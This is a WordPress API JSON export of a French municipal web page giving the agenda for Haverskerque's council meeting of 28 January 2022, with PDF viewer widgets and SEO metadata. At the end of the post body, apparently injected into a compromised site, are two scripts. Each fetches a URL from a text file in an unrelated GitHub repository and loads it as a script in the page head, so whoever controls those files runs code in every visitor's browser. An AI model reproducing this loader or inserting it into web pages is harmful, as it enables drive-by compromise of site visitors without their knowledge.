{"id":570,"date":"2022-01-29T13:03:00","date_gmt":"2022-01-29T12:03:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=570"},"modified":"2024-07-29T06:38:53","modified_gmt":"2024-07-29T04:38:53","slug":"conseil-municipal-du-28-janvier-2022","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/","title":{"rendered":"Conseil Municipal du 28 Janvier 2022"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 3 d\u00e9cembre 2021.<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Informations au Conseil Municipal.<\/p>\n\n\n\n<p><strong>INSTITUTION<\/strong><\/p>\n\n\n\n<p>1. D\u00e9signation d\u2019une conseill\u00e8re municipale d\u00e9l\u00e9gu\u00e9e \u00e0 l\u2019action sociale.<\/p>\n\n\n\n<p><strong>INTERCOMMUNALITE<\/strong><\/p>\n\n\n\n<p>2. CCFL &#8211; Culture &#8211; Reconduction des dispositifs pour le mandat 2022-2026.<br>3. CCFL &#8211; Culture &#8211; Sch\u00e9ma directeur lecture publique.<\/p>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>4. Budget principal 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b03.<\/p>\n\n\n\n<p><strong>RESSOURCES HUMAINES<\/strong><\/p>\n\n\n\n<p>5. Contrat groupe d\u2019assurance statutaire du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.<br>6. Dispositif interne de signalement des atteintes \u00e0 l\u2019int\u00e9grit\u00e9 physique, des actes de violence, de harc\u00e8lement, de discrimination, d\u2019agissements sexistes, de menaces ou tout autre acte d\u2019intimidation du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.<br>7. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.<br>8. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er f\u00e9vrier 2022.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_1949\"  _slug=\"ordre-du-jour-de-la-seance-du-28-janvier-2022\" data-title=\"ordre-du-jour-de-la-seance-du-28-janvier-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 28 Janvier 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1949 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/cm_28012022_convocation.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1946\"  _slug=\"proces-verbal-de-la-seance-du-28-janvier-2022\" data-title=\"proces-verbal-de-la-seance-du-28-janvier-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Proc\u00e8s-verbal de la s\u00e9ance du 28 Janvier 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1946 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces_verbal_de_la_seance_du_conseil_municipal_du_28_01_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1943\"  _slug=\"designation-dune-conseillere-municipale-deleguee-a-laction-sociale\" data-title=\"designation-dune-conseillere-municipale-deleguee-a-laction-sociale\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9signation d\u2019une conseill\u00e8re municipale d\u00e9l\u00e9gu\u00e9e \u00e0 l\u2019action sociale<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1943 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/designation_d_une_conseillere_municipale_deleguee_a_l_action_sociale-tamponn.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1940\"  _slug=\"ccfl-culture-reconduction-des-dispositifs-pour-le-mandat-2022-2026\" data-title=\"ccfl-culture-reconduction-des-dispositifs-pour-le-mandat-2022-2026\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL &#8211; Culture &#8211; Reconduction des dispositifs pour le mandat 2022-2026<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1940 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/cfl_-_culture_-_reconduction_des_dispositifs_pour_le_mandat_2022-2026-tampon.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1937\"  _slug=\"ccfl-culture-schema-directeur-lecture-publique\" data-title=\"ccfl-culture-schema-directeur-lecture-publique\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL &#8211; Culture &#8211; Sch\u00e9ma directeur lecture publique<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1937 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/ccfl_-_culture_-_schema_directeur_lecture_publique-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1934\"  _slug=\"budget-principal-de-la-ville-2021-decision-budgetaire-modificative-n3\" data-title=\"budget-principal-de-la-ville-2021-decision-budgetaire-modificative-n3\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Budget principal de la ville 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b03<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1934 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/budget_principal_2021_-_decision_budgetaire_modificative_no3-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1931\"  _slug=\"contrat-groupe-dassurance-statutaire-du-centre-de-gestion-de-la-fonction-publique-territoriale-du-nord\" data-title=\"contrat-groupe-dassurance-statutaire-du-centre-de-gestion-de-la-fonction-publique-territoriale-du-nord\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Contrat groupe d\u2019assurance statutaire du Centre de Gestion de la Fonction Publique Territoriale du Nord<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1931 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/contrat_groupe_d_assurance_statutaire_du_centre_de_gestion_de_la_fonction_pu.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1928\"  _slug=\"dispositif-interne-de-signalement-des-atteintes-a-lintegrite-physique-des-actes-de-violence-de-harcelement-de-discrimination-dagissements-sexistes-de-menaces-ou-tout-autre-acte\" data-title=\"dispositif-interne-de-signalement-des-atteintes-a-lintegrite-physique-des-actes-de-violence-de-harcelement-de-discrimination-dagissements-sexistes-de-menaces-ou-tout-autre-acte\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Dispositif interne de signalement des atteintes \u00e0 l\u2019int\u00e9grit\u00e9 physique, des actes de violence, de harc\u00e8lement, de discrimination, d\u2019agissements sexistes, de menaces ou tout autre acte d\u2019intimidation du Centre de Gestion de la Fonction Publique Territoriale du Nord<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1928 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/dispositif_interne_de_signalement_des_atteintes_a_l_integrite_physique_des_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1924\"  _slug=\"dispositif-de-contrat-dengagement-educatif-cee-pour-assurer-le-fonctionnement-de-laccueil-de-loisirs-de-la-commune\" data-title=\"dispositif-de-contrat-dengagement-educatif-cee-pour-assurer-le-fonctionnement-de-laccueil-de-loisirs-de-la-commune\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1924 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/dispositif_de_contrat_d_engagement_educatif_cee_pour_assurer_le_fonctionne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1921\"  _slug=\"tableau-des-effectifs-mise-a-jour-au-1er-fevrier-2022\" data-title=\"tableau-des-effectifs-mise-a-jour-au-1er-fevrier-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Tableau des effectifs &#8211; Mise \u00e0 jour au 1er f\u00e9vrier 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1921 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/tableau_des_effectifs_-_mise_a_jour_au_1er_fevrier_2022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 3 d\u00e9cembre 2021.&nbsp;Informations au Conseil Municipal. INSTITUTION 1. D\u00e9signation d\u2019une conseill\u00e8re municipale d\u00e9l\u00e9gu\u00e9e \u00e0 l\u2019action sociale. INTERCOMMUNALITE 2. CCFL &#8211; Culture &#8211; Reconduction des dispositifs pour le mandat 2022-2026.3. CCFL &#8211; Culture &#8211; Sch\u00e9ma directeur lecture publique. FINANCES 4. Budget principal 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b03. RESSOURCES HUMAINES 5. Contrat groupe d\u2019assurance statutaire du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.6. Dispositif interne de signalement des atteintes \u00e0 l\u2019int\u00e9grit\u00e9 physique, des actes de violence, de harc\u00e8lement, de discrimination, d\u2019agissements sexistes, de menaces ou tout autre acte d\u2019intimidation du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.7. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.8. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er f\u00e9vrier 2022.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-570","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 28 Janvier 2022 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 28 Janvier 2022 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 3 d\u00e9cembre 2021.&nbsp;Informations au Conseil Municipal. INSTITUTION 1. D\u00e9signation d\u2019une conseill\u00e8re municipale d\u00e9l\u00e9gu\u00e9e \u00e0 l\u2019action sociale. INTERCOMMUNALITE 2. CCFL &#8211; Culture &#8211; Reconduction des dispositifs pour le mandat 2022-2026.3. CCFL &#8211; Culture &#8211; Sch\u00e9ma directeur lecture publique. FINANCES 4. Budget principal 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b03. RESSOURCES HUMAINES 5. Contrat groupe d\u2019assurance statutaire du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.6. Dispositif interne de signalement des atteintes \u00e0 l\u2019int\u00e9grit\u00e9 physique, des actes de violence, de harc\u00e8lement, de discrimination, d\u2019agissements sexistes, de menaces ou tout autre acte d\u2019intimidation du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.7. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.8. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er f\u00e9vrier 2022.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2022-01-29T12:03:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:53+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 28 Janvier 2022\",\"datePublished\":\"2022-01-29T12:03:00+00:00\",\"dateModified\":\"2024-07-29T04:38:53+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/\"},\"wordCount\":197,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/\",\"name\":\"Conseil Municipal du 28 Janvier 2022 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2022-01-29T12:03:00+00:00\",\"dateModified\":\"2024-07-29T04:38:53+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/01\\\/29\\\/conseil-municipal-du-28-janvier-2022\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 28 Janvier 2022\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 28 Janvier 2022 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 28 Janvier 2022 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 3 d\u00e9cembre 2021.&nbsp;Informations au Conseil Municipal. INSTITUTION 1. D\u00e9signation d\u2019une conseill\u00e8re municipale d\u00e9l\u00e9gu\u00e9e \u00e0 l\u2019action sociale. INTERCOMMUNALITE 2. CCFL &#8211; Culture &#8211; Reconduction des dispositifs pour le mandat 2022-2026.3. CCFL &#8211; Culture &#8211; Sch\u00e9ma directeur lecture publique. FINANCES 4. Budget principal 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b03. RESSOURCES HUMAINES 5. Contrat groupe d\u2019assurance statutaire du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.6. Dispositif interne de signalement des atteintes \u00e0 l\u2019int\u00e9grit\u00e9 physique, des actes de violence, de harc\u00e8lement, de discrimination, d\u2019agissements sexistes, de menaces ou tout autre acte d\u2019intimidation du Centre de Gestion de la Fonction Publique Territoriale du Nord &#8211; Adh\u00e9sion et autorisation de signature de la convention d\u2019adh\u00e9sion.7. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.8. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er f\u00e9vrier 2022.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2022-01-29T12:03:00+00:00","article_modified_time":"2024-07-29T04:38:53+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 28 Janvier 2022","datePublished":"2022-01-29T12:03:00+00:00","dateModified":"2024-07-29T04:38:53+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/"},"wordCount":197,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/01\/29\/conseil-municipal-du-28-janvier-2022\/","name":"Conseil Municipal du 28 Janvier 2022 * Haverskerque, 100% Nature 